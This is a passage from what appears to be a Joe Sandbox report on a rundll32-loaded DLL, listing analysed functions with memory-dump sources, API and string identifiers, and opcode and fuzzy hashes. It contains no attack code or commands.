                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: 695fa22a1d6d23245e75d15cd8436973dff841ec1e986202785ff3774109f988
                                                                                                                                  • Instruction ID: 09fe364ddf780e93d9049d4f58e0a1b9e30b89f7d2aa5cb162c798bc91164caf
                                                                                                                                  • Opcode Fuzzy Hash: 695fa22a1d6d23245e75d15cd8436973dff841ec1e986202785ff3774109f988
                                                                                                                                  • Instruction Fuzzy Hash: 69317032604A4D81FAA3DB15E4417E97361F7987E0F148222BA5D07BE9DF38CA8AC700
                                                                                                                                  Function 0000000180007180 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_RegisterThrow_lockstd::bad_exception::bad_exception
                                                                                                                                  • String ID: bad cast
                                                                                                                                  • API String ID: 1776536810-3145022300
                                                                                                                                  • Opcode ID: 2c248766304681b0c2bab5ac96b723214e976363793dd3940de8d17814ddb4c4
                                                                                                                                  • Instruction ID: d5f3d85ad48d5269fabfe6c01bbad63a5faf147fba86dc7cd225a5bba448d346
                                                                                                                                  • Opcode Fuzzy Hash: 2c248766304681b0c2bab5ac96b723214e976363793dd3940de8d17814ddb4c4
                                                                                                                                  • Instruction Fuzzy Hash: 16315071700A4881FA97DB15E4403D97761F7A8BE0F58C321FA5D036E6DE38C68AC740
                                                                                                                                  Function 00007FFD92DC1560 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastLocal$Free$AddressAllocLibraryLoadProc
                                                                                                                                  • String ID: Shell32.dll$ShellExecuteW
                                                                                                                                  • API String ID: 3119643837-1473611414
                                                                                                                                  • Opcode ID: f4849fe2f0c7abd62b89033c976954a72196e0344b8972263a8a602321c030f5
                                                                                                                                  • Instruction ID: b7420bb9280e5b48deec20829274d0d8af55381c907cead4725564f57b8e5e77
                                                                                                                                  • Opcode Fuzzy Hash: f4849fe2f0c7abd62b89033c976954a72196e0344b8972263a8a602321c030f5
                                                                                                                                  • Instruction Fuzzy Hash: E621D666B1CB8285FA70DF96B87017AA3A4BF48BE5F080438DE4D53B64EE7CE0519700
                                                                                                                                  Function 00000001800023F0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  • Opcode ID: a68a3c255015a623e0952fdafce5552ec4697e039a4adfb181130a635e184be4
                                                                                                                                  • Instruction ID: b3155ec887754ec426d41302e82ca1272bd2955ff3b21f2f7d625a5ccb09a45c
                                                                                                                                  • Opcode Fuzzy Hash: a68a3c255015a623e0952fdafce5552ec4697e039a4adfb181130a635e184be4
                                                                                                                                  • Instruction Fuzzy Hash: 51213071A11F59D8FB96DB64E8817EC3375B718388F908126F94922AA9EF35C74EC340
                                                                                                                                  Function 00007FFD92E39E60 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 41COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                  • API String ID: 4139908857-2387153273
                                                                                                                                  • Opcode ID: 13d3deadd11c91aaa1b09a78a1db330eb72840e8f80f03264e7b8b5f1608b1d5
                                                                                                                                  • Instruction ID: 1fec302fdd5e2a686b2a2e57b6cf79fa560a1201aadf982231699867359ade1e
                                                                                                                                  • Opcode Fuzzy Hash: 13d3deadd11c91aaa1b09a78a1db330eb72840e8f80f03264e7b8b5f1608b1d5
                                                                                                                                  • Instruction Fuzzy Hash: 4711FA64F19B4280FA34EFD1B8B83B022D8AF04346F481635D80D963A1EFBCA694D350
                                                                                                                                  Function 0000000180001180 Relevance: 10.5, APIs: 7, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_errnosetlocalestd::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1855319098-0
                                                                                                                                  • Opcode ID: 2f9469f7e86d9ed662453ed7390a40d8cb98c28b94d45fdd9a0046f49d435607
                                                                                                                                  • Instruction ID: b48272a0fe48caf80c68cbfff6fe37b1983f1ac57bfd09bfec3c9c3905106cea
                                                                                                                                  • Opcode Fuzzy Hash: 2f9469f7e86d9ed662453ed7390a40d8cb98c28b94d45fdd9a0046f49d435607
                                                                                                                                  • Instruction Fuzzy Hash: 85010831202A9888EF9FDF65D5917EC73A4EF59FC8F188116BA4906A86CE64CD94C740
                                                                                                                                  Function 00000001800312AC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _getptd
                                                                                                                                  • String ID: MOC$RCC$csm
                                                                                                                                  • API String ID: 3186804695-2671469338
                                                                                                                                  • Opcode ID: 79c6bdfdf6facc246eee842b2de7a644aa034f1ac0e2309a20206dc5bd345c8d
                                                                                                                                  • Instruction ID: cee1693f68b0781dadb7962070319637af549046bf3e62ebc375f9a8a227fa41
                                                                                                                                  • Opcode Fuzzy Hash: 79c6bdfdf6facc246eee842b2de7a644aa034f1ac0e2309a20206dc5bd345c8d
                                                                                                                                  • Instruction Fuzzy Hash: 6DF0303550814CCAE6DB2B5484053FF2790EB9DB87F8BC1A2A30082382CFBC47989B57
                                                                                                                                  Function 00007FFD92DC0460 Relevance: 9.3, APIs: 6, Instructions: 334COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EmptyRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2270935405-0
                                                                                                                                  • Opcode ID: d980002bf735433719a339c1b30e8d820760182589dd7f874130936071ff0318
                                                                                                                                  • Instruction ID: 099b58ac5bed0d80785554bffe5cfd392e6d12c9829e6505ef70933859d955d7
                                                                                                                                  • Opcode Fuzzy Hash: d980002bf735433719a339c1b30e8d820760182589dd7f874130936071ff0318
                                                                                                                                  • Instruction Fuzzy Hash: 32024BB2A05F5186E660CF55F8986A933ECFB48B49F524639CE9D03B62DF39D054D310
                                                                                                                                  Function 0000000180006A80 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 210COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  • Opcode ID: 929456a826c5cb86168c23e50031e89aca919ba6b7336e00f1ffe86e266b3d15
                                                                                                                                  • Instruction ID: 236ed865422d3fdca970c5237e1e28b9fcf6c9cb8c767a6c1dee54dc2b89609d
                                                                                                                                  • Opcode Fuzzy Hash: 929456a826c5cb86168c23e50031e89aca919ba6b7336e00f1ffe86e266b3d15
                                                                                                                                  • Instruction Fuzzy Hash: 9EA15672605B4885EBA6CF19D0903AD77A1F788BC4F50C112EA8D437B5DF3AC68AC700
                                                                                                                                  Function 00007FFD92FED77C Relevance: 9.1, APIs: 6, Instructions: 103threadCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: a6c294782ecb49a4f98d512ccf521d9b166f33ffd94ec85b9b506cbbeadca105
                                                                                                                                  • Instruction ID: d33cf6c0fb3a37a82da0c3f34c99aabb08836cd47d041b6a54e4a67377d67eb9
                                                                                                                                  • Opcode Fuzzy Hash: a6c294782ecb49a4f98d512ccf521d9b166f33ffd94ec85b9b506cbbeadca105
                                                                                                                                  • Instruction Fuzzy Hash: 00414035B08606C6FB71AFA6D46067973A8FB44B96F404131CA9E92EA0CF7DE984C701
                                                                                                                                  Function 00007FFD92DC3240 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD93003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602385661.00007FFD930A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602615645.00007FFD930A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602650721.00007FFD930A7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602676417.00007FFD930A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602717324.00007FFD930A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602759419.00007FFD930E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4602834250.00007FFD930EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleSemaphore$CloseCreate$FreeLibraryModuleRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2305605725-0
                                                                                                                                  • Opcode ID: 2d879112fbd9533a903f1173ef03b82438ed6fbc637b852d21d6883aba767204
                                                                                                                                  • Instruction ID: ad832aadcd1ba2f89c9115c50e3e4b0fedd3c285728e42e6ac3aacd09cdf9517
                                                                                                                                  • Opcode Fuzzy Hash: 2d879112fbd9533a903f1173ef03b82438ed6fbc637b852d21d6883aba767204
                                                                                                                                  • Instruction Fuzzy Hash: 08415C32B09B4282F7B49FA1E8A016A73A8FF44F95B144238DE5D47788DFB8D554C384
                                                                                                                                  Function 000000018000702A Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 78COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  • Opcode ID: 699b7d2228cff961f95bcc84e6e72b285b1e2d0b36deb1e7e2300fec3cbeab5f
                                                                                                                                  • Instruction ID: dfa8a448075bbfc6b28c82488b61fa1b389f2e2b11f37815cd1c202517538396
                                                                                                                                  • Opcode Fuzzy Hash: 699b7d2228cff961f95bcc84e6e72b285b1e2d0b36deb1e7e2300fec3cbeab5f
                                                                                                                                  • Instruction Fuzzy Hash: 0B315272614A8991EBA2DB18E4913D973A0F79C7C8F508522F68C53AA6DF3DC74EC740
                                                                                                                                  Function 0000000180006C5A Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4587767702.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4587656400.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587832120.000000018004A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587871495.0000000180060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4587931343.00000001800A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionThrow
                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                  • API String ID: 432778473-1866435925
                                                                                                                                  • Opcode ID: c1bf02ce45ab6fee79512c4fb28b2e7da53ceb844cf42f62b2c87471bab989a1
                                                                                                                                  • Instruction ID: 550f9bc1cb9aa3d44aa237adf6378d9f0374be7e19af6188f2c51a58d4ea2558
                                                                                                                                  • Opcode Fuzzy Hash: c1bf02ce45ab6fee79512c4fb28b2e7da53ceb844cf42f62b2c87471bab989a1
                                                                                                                                  • Instruction Fuzzy Hash: 5B317C32614A8991EBA2CB14E4913D973A1F7887C4F508522FA8C53AAADF39C64EC740
                                                                                                                                  Function 00007FFD92DB5800 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.4601807365.00007FFD92DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92DF0000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92E4C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD92FF5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000004.00000002.4601850792.00007FFD93000000.00000020.00000001.01000000.00000003.sdmpDownload File
